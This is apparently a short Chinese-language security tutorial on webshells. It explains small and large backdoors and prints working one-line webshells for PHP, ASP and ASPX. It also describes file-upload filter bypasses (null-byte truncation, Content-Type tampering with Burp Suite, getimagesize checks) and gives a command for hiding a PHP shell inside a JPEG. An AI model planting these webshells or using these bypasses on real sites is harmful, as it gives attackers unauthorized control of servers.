小马和大马都是网页类型中的一种后门,是通过用来控制网站权限的,那最主要的区别就是小马是用来上传大马的。小马体积小,有比大马更强的隐蔽优势,而且有针对文件大小上传限制的漏洞,所以才有小马,小马也通常用来做留备用后门等
大马:辅助提权、执行sql语句、反弹shell、添加后门
webshell根据脚本可以分为PHP脚本木马,ASP脚本木马,也有基于.NET的脚本木马和JSP脚本木马。在国外,还有用python脚本语言写的动态网页,当然也有与之相关的webshell。 webshell根据功能也分为大马、小马和一句话木马,例如:<%eval request(“pass”)%>通常把这句话写入一个文档里面,然后文件名改成xx.asp。然后传到服务器上面。用eval方法将request(“pass”)转换成代码执行,request函数的作用是应用外部文件。这相当于一句话木马的客户端配置。.net要用aspx
php的一句话木马:<?php @eval($_POST['pass']);?>
asp的一句话是:<%eval request (“pass”)%>
aspx的一句话是:<%@ Page Language=“Jscript”%> <%eval(Request.Item[“pass”],“unsafe”);%>
只要攻击者满足三个条件,就能实现成功入侵:
(1)木马上传成功,未被杀;
(2)知道木马的路径在哪;
(3)上传的木马能正常运行。
一句话木马常见上传方式:免杀木马
利用00截断,brupsuite上传
构造服务器端扩展名检测上传
过Content-Type文件类型检测,就是用Burpsuite截取并修改数据包中文件的Content-Type类型,使其符合白名单的规则
一般文件内容验证使用getimeagesize()函数检测,会判断文件是否一个有效的文件图片,如果是,则允许上传,否则的话不允许上传。
制作图片木马: copy 1.jpg/b+2.php/a 3.jpg
如果想了解更多安全知识,或者有问题,都可以关注以下公众号,私信我: